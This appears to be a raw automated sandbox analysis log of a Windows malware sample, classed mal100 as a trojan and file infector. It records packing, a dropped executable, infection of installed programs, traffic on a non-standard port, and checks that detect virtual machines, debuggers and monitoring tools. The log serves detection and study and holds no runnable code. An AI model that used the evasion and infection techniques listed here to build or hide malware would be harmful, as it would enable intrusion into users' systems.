      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name: #bu
      Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
      PE file has a writeable .text section
      Source: jawuwAtX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_003260762_2_00326076
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_00326D002_2_00326D00
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548
      Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2178655247.0000000003497000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2193713939.0000000000431000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2180934441.0000000003472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
      Source: Lisect_AVT_24003_G1A_72.exeBinary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: jawuwAtX.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jawuwAtX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: jawuwAtX.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: Section: ZLIB complexity 0.9941202546453066
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: Section: ZLIB complexity 1.0038910505836576
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: Section: ZLIB complexity 0.9985546038543898
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: Section: ZLIB complexity 0.9984027121296085
      Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/11@8/1
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_0032119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_0032119F
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rarJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5352
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeFile created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Lisect_AVT_24003_G1A_72.exeVirustotal: Detection: 86%
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeFile read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe"
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeProcess created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeProcess created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe C:\Users\user\AppData\Local\Temp\jawuwAtX.exeJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: ntvdm64.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
      Source: Lisect_AVT_24003_G1A_72.exeStatic file information: File size 4900864 > 1048576
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x383026
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeUnpacked PE file: 2.2.jawuwAtX.exe.320000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
      Source: initial sampleStatic PE information: section where entry point is pointing to: #bu
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name: .imports
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name: .themida
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name: .boot
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name: #bu
      Source: jawuwAtX.exe.0.drStatic PE information: section name: .aspack
      Source: jawuwAtX.exe.0.drStatic PE information: section name: .adata
      Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
      Source: MyProg.exe.2.drStatic PE information: section name: PELIB
      Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
      Source: SciTE.exe.2.drStatic PE information: section name: u
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_00321638 push dword ptr [00323084h]; ret 2_2_0032170E
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_00326014 push 003214E1h; ret 2_2_00326425
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_00322D9B push ecx; ret 2_2_00322DAB
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_0032600A push ebp; ret 2_2_0032600D
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name: entropy: 7.9668438970178
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name: #bu entropy: 6.935155293246564
      Source: jawuwAtX.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
      Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.934455585546093
      Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.934357838115891
      Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.9340336005643985

      Persistence and Installation Behavior

      barindex
      Infects executable files (exe, dll, sys, html)
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeFile created: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

      Boot Survival

      barindex
      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeWindow searched: window name: RegmonClassJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 799
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSystem information queried: FirmwareTableInformationJump to behavior
      Tries to detect sandboxes / dynamic malware analysis system (registry check)
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-1046
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe TID: 5204Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe TID: 5204Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_00321718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00321754h2_2_00321718
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_003229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_003229E2
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_00322B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00322B8C
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
      Source: Amcache.hve.2.drBinary or memory string: VMware
      Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4=
      Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.2.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001041000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0T
      Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.2.drBinary or memory string: vmci.sys
      Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.2.drBinary or memory string: VMware20,1
      Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeAPI call chain: ExitProcess graph end nodegraph_2-1021
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeSystem information queried: ModuleInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeThread information set: HideFromDebuggerJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (window names)
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
